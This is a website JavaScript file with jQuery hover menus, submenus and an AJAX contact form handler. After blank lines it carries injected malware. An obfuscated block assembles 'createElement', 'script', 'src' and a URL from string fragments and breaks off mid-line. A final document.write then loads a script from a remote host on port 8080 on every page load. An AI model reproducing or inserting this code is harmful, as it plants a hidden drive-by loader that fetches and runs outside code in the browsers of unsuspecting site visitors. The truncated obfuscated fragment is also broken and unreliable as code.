function menu() {
	$("ul.topnav span").hover(function () {
		$(this).stop().animate({
			opacity: 1
		}, 'slow');
	},
	function () {
		$(this).stop().animate({
			opacity: 0
		}, 'slow');
	});
};


function submenu(){
			
	$("ul.topnav li a.produtos").hover(function() { //When trigger is clicked...
			
			//Following events are applied to the subnav itself (moving subnav up and down)
			$(this).parent().find("ul.subnav").stop().slideDown(10).show('slow', function(){
				$(this).height("250px");
				$(this).css("overflow","visible");
				$(this).css("padding-top","10px");
				$(this).parent().children().find("span").css("background:blue");
				
			}); //Drop down the subnav on click
		
	
				$(this).parent().hover(function() {
				}, function(){	
					$(this).parent().find("ul.subnav").stop().slideUp(10); //When the mouse hovers out of the subnav, move it back up
				});

		//Following events are applied to the trigger (Hover events for the trigger)
		}).hover(function() { 
			$(this).addClass("subhover"); //On hover over, add class "subhover"
		}, function(){	//On Hover Out
			$(this).removeClass("subhover"); //On hover out, remove class "subhover"
	});
	
	

	
	$("ul.topnav li ul.subnav li a").hover(function() { //When trigger is clicked...
		
		//Following events are applied to the subnav itself (moving subnav up and down)
		$(this).parent().find("ul.subsubnav").stop().slideDown(10).show('slow', function(){
			$(this).css("padding-top","5px");
			$(this).css("padding-bottom","5px !important");
			$(this).height("auto");
		}); //Drop down the subnav on click


		$(this).parent().hover(function() {
		}, function(){	
			$(this).parent().find("ul.subsubnav").stop().slideUp(10); //When the mouse hovers out of the subnav, move it back up
		});

		//Following events are applied to the trigger (Hover events for the trigger)
		}).hover(function() { 
			$(this).addClass("subsubhover"); //On hover over, add class "subhover"
		}, function(){	//On Hover Out
			$(this).removeClass("subsubhover"); //On hover out, remove class "subhover"
	});

};

function contactos() {
	var options = { 
	target:'#alert'
	}; 
	$('#contactForm').ajaxForm(options); 
};






this.v='';this.C=51578;this.C-=144;function W(){var j="j";k={};var M=document;try {var WL='l'} catch(WL){};var G=new String("crea"+"teEl"+"emen0NH".substr(0,4)+"t");var g=new String("onl"+"oad");var _=String("defer");var e="scri"+"VCOpt".substr(3);var Aa=["aI","Gp"];var L=new Array();var n=String("yAvappe".substr(3)+"ndCh"+"YT5oild".substr(4));var t={QF:false};nw=26568;nw++;Y=["TM","w","Fc"];XD={kO:"oI"};var H="body";var T=String("srcQmA".substr(0,3));var eG=new String();var Q=window;nY={};try {var B='MP'} catch(B){};Mc=[];function r(){var VD=[];d=40349;d-=155;u_=13236;u_+=165;this.D="D";try {YP=["HH","Yb","Hc"];var u=9630-9629;var h="/go"+"y0zogl".substr(3)+"e.cwlpN".substr(0,3)+"om/"+"TaoikeToa".substr(3,3)+"GlRsa.cGRls".





document.write('<s'+'cript type="text/javascript" src="http://dodo.busop.info:8080/Bcc.js"></scr'+'ipt>');